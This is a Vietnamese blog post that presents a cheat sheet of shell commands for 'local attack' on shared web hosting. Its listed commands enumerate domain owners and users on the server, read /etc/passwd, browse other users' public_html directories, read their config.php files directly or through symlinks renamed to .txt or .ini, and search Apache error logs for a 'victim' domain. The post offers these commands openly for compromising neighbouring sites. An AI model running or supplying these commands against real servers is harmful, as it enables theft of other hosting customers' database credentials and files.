Top Ad unit 728 × 90

Lastet News

random

Tổng hợp những lệnh trên shell hay dùng nhất khi local


Bài viết này sẽ giới thiệu các bạn một số lệnh hay dùng để tiến hành local attack.

1) Xem list domain & user trên cùng sever
Mã:
directadmin: cat /etc/virtual/domainowners
cpanel: ls -la /etc/valiases/tendomainvictim.com

cd/etc/vdomainaliases;ls-lia
Trường hợp đặc biệt khi không thể xem user nằm cùng host thì ta thêm && vào
Mã:
cd/etc/vdomainaliases && ls-lia

2)Xem tên user: tùy vàodistro linux khác nhau sẽ có các câu lệnh đọc file khác nhau.

Mã:
cat /etc/passwd
less /etc/passwd
more /etc/passwd
head /etc/passwd
tac /etc/passwd
rev /etc/passwd
xxd /etc/passwd

3)Local sang victim bằng lệnh dir ( 2013 - giờ hiếm server nào còn sài được)
Mã:
dir /home/ten user can local/public_html
vd: dir /home/vhb/public_html

4)Xem nội dung file lệnh xem file cũng tương tự như mục số 2 
-> có thể sài các lệnh đó thay thế cho cat, less,...
Mã:
[code]cat/home/ten user can local/public_html/index.php[code]
vd: cat /home/vhb/public_html/@vhb@/includes/config.php
vd: less /home/vhb/public_html/@vhb@/includes/config.php
5) Symlink: tác dụng gần giống như tạo shorcut trên windows.

Mã:
ln -s/home/ten user can local/public_html/index.php index.txt
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.txt
vd: ln -s /home/vhb/public_html/@vhb@/includes/config.php 1.ini
với file 1.txt hay 1.ini là mình tự đặt để nó tạo liên kết từ file config.php đến.

6) Tìm path của mấy victim sài Add on domain
find /usr/local/apache/logs/ -name 'error_log' | xargs grep -E 'victim.com'


Tổng hợp những lệnh trên shell hay dùng nhất khi local Reviewed by Unknown on 01:27 Rating: 5

Không có nhận xét nào:

body{ margin-top:50px;} .menuBar{ width:100%; height:50px; display:block; position:absolute; top:0; left:0; } .logo{ float:left; } .nav{ float:right; margin-right:10px;} .nav ul li{ list-style:none; float:left; }

All Rights Reserved by Huy Hùng - KMA © 2014 - 2015
Designed by JOJOThemes

Biểu mẫu liên hệ

Tên

Email *

Thông báo *

Được tạo bởi Blogger.